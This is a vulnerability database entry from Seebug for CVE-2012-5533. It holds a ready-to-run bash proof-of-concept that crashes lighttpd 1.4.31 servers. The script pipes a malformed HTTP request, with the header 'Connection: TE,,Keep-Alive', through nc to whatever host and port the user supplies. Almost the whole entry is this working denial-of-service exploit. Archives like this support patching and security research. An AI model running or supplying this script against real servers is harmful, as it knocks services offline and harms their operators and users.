Lucene search

K
seebugRootSSV:76695
HistoryJul 01, 2014 - 12:00 a.m.

lighttpd 1.4.31 Denial of Service PoC

2014-07-0100:00:00
Root
www.seebug.org
118

0.87 High

EPSS

Percentile

98.3%

No description provided by source.


                                                #!/bin/bash
# Exploit Title: simple lighttpd 1.4.31 DOS POC
# Date: 11/21/2012
# Exploit Author: [email protected]
# Vendor Homepage: http://www.lighttpd.net
# Software Link: http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-1.4.31.tar.gz 
# Version: 1.4.31
# Tested on: Debian Linux, Gentoo Linux, Arch Linux
# CVE: CVE-2012-5533

if [ $# -lt 2 ]
then
	echo "usage :$0 <Host/IP> <Port>"
else
	echo -ne "GET / HTTP/1.1\r\nHost: pwn.ed\r\nConnection: TE,,Keep-Alive\r\n\r\n" | nc $1 $2
fi